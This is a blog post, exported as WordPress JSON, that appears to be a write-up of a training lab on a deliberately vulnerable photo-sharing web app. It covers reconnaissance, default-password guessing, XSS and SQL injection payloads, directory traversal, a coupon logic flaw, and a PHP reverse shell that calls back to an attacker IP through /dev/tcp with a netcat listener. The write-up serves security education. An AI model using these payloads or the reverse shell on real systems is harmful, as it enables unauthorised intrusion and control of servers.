{"id":196,"date":"2020-06-09T06:23:46","date_gmt":"2020-06-08T22:23:46","guid":{"rendered":"https:\/\/byy3.com\/?p=196"},"modified":"2020-06-09T06:23:46","modified_gmt":"2020-06-08T22:23:46","slug":"webappsec-101","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=196","title":{"rendered":"WebAppSec 101"},"content":{"rendered":"\n

[Task 1] Basic Description & Objectives<\/strong><\/p>\n\n\n\n

[Task 2] Walking through the application
<\/strong>- What version of Apache is being used?
- What language was used to create the website?
- What version of this language is used?<\/p>\n\n\n\n

Let\u2019s do the information gathering first.
1. Test web functionality
2. Home section \u2192 malicious file upload<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

3. Home section \u2014 search \u2192 SQL injection, XSS<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n
\"WebAppSec<\/figure>\n\n\n\n

4. Home section \u2014 create account \u2192 SQL Injection
I fill every text box with \u201ctest\u201d.<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n
\"WebAppSec<\/figure>\n\n\n\n

It seems like I logged in with user \u201ctest\u201d.<\/p>\n\n\n\n

5. Test similar name function<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

6. Your uploaded pics<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

7. Your purchased pics<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

8. Back to create account section \u2014 Let\u2019s test for password strength \u2192 command injection<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n
\"WebAppSec<\/figure>\n\n\n\n
\"WebAppSec<\/figure>\n\n\n\n

9. Check out sample user \u2192 Broken Access Control<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n
\"WebAppSec<\/figure>\n\n\n\n

10. Check out what is going on today<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

Click what about tomorrow until there\u2019s is a coupon code.<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n
\"WebAppSec<\/figure>\n\n\n\n

11. Check upload section
Login first<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

It\u2019s the same page as we visited before.<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

12. Check recent section<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

13. Check guestbook section \u2192 XSS<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

14. Check cart section<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

View some picture and buy it<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n
\"WebAppSec<\/figure>\n\n\n\n
\"WebAppSec<\/figure>\n\n\n\n
\"WebAppSec<\/figure>\n\n\n\n

15. Let\u2019s view the bottom section \u2192 Password guessing, Brute-forcing, SQL injection<\/p>\n\n\n\n

Admin<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

Contact<\/p>\n\n\n\n\n\n

Terms of service<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

16. Search web paths with dirbuster
Results \u2014 I visited every links, but the links aren\u2019t interesting.<\/p>\n\n\n\n

\"WebAppSec<\/figure>\n\n\n\n

17. Search site\u2019s vulnerabilities and information.<\/p>\n\n\n\n

nikto -h http:\/\/10.10.92.34\/<\/a><\/pre>\n\n\n\n
\"WebAppSec<\/figure>\n\n\n\n
18. Answer the questions
- What version of Apache is being used? 2.4.7<\/strong>
- What language was used to create the website? PHP<\/strong>
- What version of this language is used? 5.5.9<\/strong><\/p>\n\n\n\n
Conclusion
<\/strong>There\u2019 re potential vulnerabilities:
1. Malicious file upload
2. SQL injection,
3. XSS
4. Command injection
5. Broken Access Control
6. Password guessing
7. Brute-forcing<\/p>\n\n\n\n
\n\n\n\n
[Task 3] Establishing a methodology<\/strong><\/p>\n\n\n\n
[Task 4] Authentication
- <\/strong>What is the admin username?
- What is the admin password?
- What is the name of the cookie that can be manipulated?
- What is the username of a logged on user?
- What is the corresponding password to the username?<\/p>\n\n\n\n
  1. Let\u2019s try guessing admin username and password. There\u2019 re 4 combinations that I can think of:
    - admin: admin
    -admin:password
    -root:root
    -root:password<\/li>
  2. Let\u2019s login in Login Panel
    None of the combinations worked<\/li><\/ol>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    3. Let\u2019s login in Admin Panel
    Luckily \u201cadmin : admin\u201d worked<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    Although, I clicked \u201cCreate a new user!\u201d, but nothing worked.<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    To answer the question
    -What is the admin username? admin<\/strong>
    - What is the admin password? admin<\/strong><\/p>\n\n\n\n
    4. Let\u2019s try to find the cookie.
    Back to home page<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    Inspect Element<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    In console tab, type<\/p>\n\n\n\n
    alert(document.cookie)<\/pre>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    There\u2019s PHPSESSID, but it\u2019s the wrong answer.<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    Let\u2019s try the method again in admin panel.<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    To answer the question
    -What is the name of the cookie that can be manipulated? session<\/strong><\/p>\n\n\n\n
    5. Let\u2019s access other user data
    Click \u201cCheck out a sample user!\u201d<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    Try to break access control by manipulating parameter<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    These pictures are potential users
    -Bob<\/p>\n\n\n\n\n\n
    -scanner1<\/p>\n\n\n\n\n\n\n\n
    -scanner2<\/p>\n\n\n\n\n\n
    -scanner3<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    -scanner4<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    -scanner5<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    -wanda<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    -calvinwatters<\/p>\n\n\n\n
    \"WebAppSec<\/figure>\n\n\n\n
    -bryce<\/p>\n\n\n\n\n\n
    I tried userid 12 and 13, but it\u2019s the empty page. I\u2019ll stop listing users method for now.<\/p>\n\n\n\n
    As a conclusion, there\u2019re 9 potential users. I\u2019ll try password guessing first by this list:
    Bob \u2192 Bob:Bob, bob:bob
    scanner1 \u2192 scanner1:scanner1
    scanner2 \u2192 scanner2:scanner2
    scanner3 \u2192 scanner3:scanner3
    scanner4 \u2192 scanner4:scanner4
    scanner5 \u2192 scanner5:scanner5
    wanda \u2192 wanda:wanda
    calvinwatters \u2192 calvinwatters:calvinwatters
    bryce \u2192 bryce: bryce<\/p>\n\n\n\n
    Luckily, I can logged in with bryce:bryce<\/p>\n\n\n\n\n\n\n\n
    To answer the question
    - What is the username of a logged on user? bryce<\/strong>
    - What is the corresponding password to the username? bryce<\/strong><\/p>\n\n\n\n
    \n\n\n\n
    [Task 5] Cross Site Scripting (XSS)
    <\/strong>I used cheat sheet from https:\/\/portswigger.net\/web-security\/cross-site-scripting\/cheat-sheet<\/a><\/p>\n\n\n\n
    <iframe src=\"javascript:alert(1)\"><\/pre>\n\n\n\n
    1. Test for XSS on the search bar<\/li><\/ol>\n\n\n\n\n\n
      2. Test for XSS on the guestbook page<\/p>\n\n\n\n
      Name: <iframe src=\u201djavascript:alert(1)\u201d>
      Comment: test<\/pre>\n\n\n\n
      not work<\/p>\n\n\n\n\n\n\n\n
      Let\u2019s try again<\/p>\n\n\n\n
      Name: test
      Comment: <iframe src=\u201djavascript:alert(1)\u201d><\/pre>\n\n\n\n\n\n\n\n
      3. Test for XSS behind the flash form on the home page \u2192 I skipped this due to flash player is turned off.<\/p>\n\n\n\n\n\n
      \n\n\n\n
      [Task 6] Injection
      <\/strong>- Perform command injection on the check password field
      - Check for SQLi on the application<\/p>\n\n\n\n
      1. Perform command injection on the check password field \u2014 I skipped this due to when I perform the injection, the machine will break itself.<\/li>
      2. Check for SQLi on the application
        In login page put<\/li><\/ol>\n\n\n\n
        ' or 1=1--<\/pre>\n\n\n\n\n\n
        not work though<\/p>\n\n\n\n\n\n
        Let\u2019s try in register an account<\/p>\n\n\n\n\n\n
        works!!!<\/p>\n\n\n\n\n\n
        \n\n\n\n
        [Task 7] Miscellaneous & Logic Flaws<\/strong><\/p>\n\n\n\n
        -Find a parameter manipulation vulnerability
        -Find a directory traversal vulnerability
        -Find a forceful browsing vulnerability
        -Logic flaw: try get an item for free<\/p>\n\n\n\n
        1. Find a parameter manipulation vulnerability
          \u2014 already done in Task 4 number 5<\/li>
        2. Find a directory traversal vulnerability
          In upload a picture, I type command and upload some files.<\/li><\/ol>\n\n\n\n
          ..\/etc\/passwd<\/pre>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Now, I get the path<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Let\u2019s type<\/p>\n\n\n\n
          http:\/\/<ip>\/upload\/<\/pre>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Try to upload reverse shell
          Here\u2019s my php reverse shell<\/p>\n\n\n\n
          <?php
          exec(\"\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.8.21.124\/1234 0>&1'\");?><\/pre>\n\n\n\n
          Upload it<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Success uploading<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Check in \/upload<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Back to attacker\u2019s machine<\/p>\n\n\n\n
          nc -lvp 1234<\/pre>\n\n\n\n
          Click on the file<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Back to attacker\u2019s machine, now we have a shell<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          3. Find a forceful browsing vulnerability
          Try to buy some image<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Before purchasing it, users can access high quality image<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          4. Logic flaw: try get an item for free
          In home section, click What is going on today?<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Click What about tomorrow? until I have coupon code : SUPERYOU21<\/strong><\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Back to the cart. Try to apply coupon twice<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          Apply until I don\u2019t have to pay<\/p>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          \"WebAppSec<\/figure>\n\n\n\n
          This all THANKS<\/h4>\n","protected":false},"excerpt":{"rendered":"
          [Task 1] Basic Description & Objectives [Task 2] Wa […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-196","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/196","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=196"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/196\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=196"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=196"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}